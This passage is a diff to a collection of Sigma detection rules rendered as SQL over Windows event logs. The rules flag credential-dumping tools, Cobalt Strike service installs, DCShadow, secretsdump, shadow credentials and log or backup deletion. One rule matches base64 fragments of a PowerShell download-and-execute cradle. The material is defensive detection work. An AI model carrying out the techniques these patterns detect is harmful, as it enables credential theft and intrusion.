"attack.collection", + "attack.t1039" + ], + "falsepositives": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], + "filename": "win_security_susp_raccess_sensitive_fext.yml" + }, + { + "title": "Group Modification Logging", + "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "status": "stable", + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" + 
"SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_group_modification_logging.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": 
"experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - 
"filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." 
], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target 
environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Scheduled Task Deletion", + "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "status": "experimental", + "description": "Detects scheduled task 
deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "author": "David Strassegger, Tim Shelton", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "car.2013-08-001", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installation" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_scheduled_task_deletion.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": 
[ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Changes made to or by the local NTP 
service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ "attack.persistence", - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.t1134.005" ], "falsepositives": [ - "Unknown" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Outgoing Logon with New Credentials", + "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], + "description": "Detects logon events that specify new credentials", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate remote administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_susp_logon_newcredentials.yml" }, { - "title": "File Deleted Via Sysinternals SDelete", - "id": 
"6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "status": "experimental", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "If source account name is not an admin then its super suspicious" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", 
"status": "experimental", - "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Legitime usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", - "status": "experimental", - "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", + "status": "test", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "During uninstallation of the IIS service", - "During log rotation" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS 
service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. 
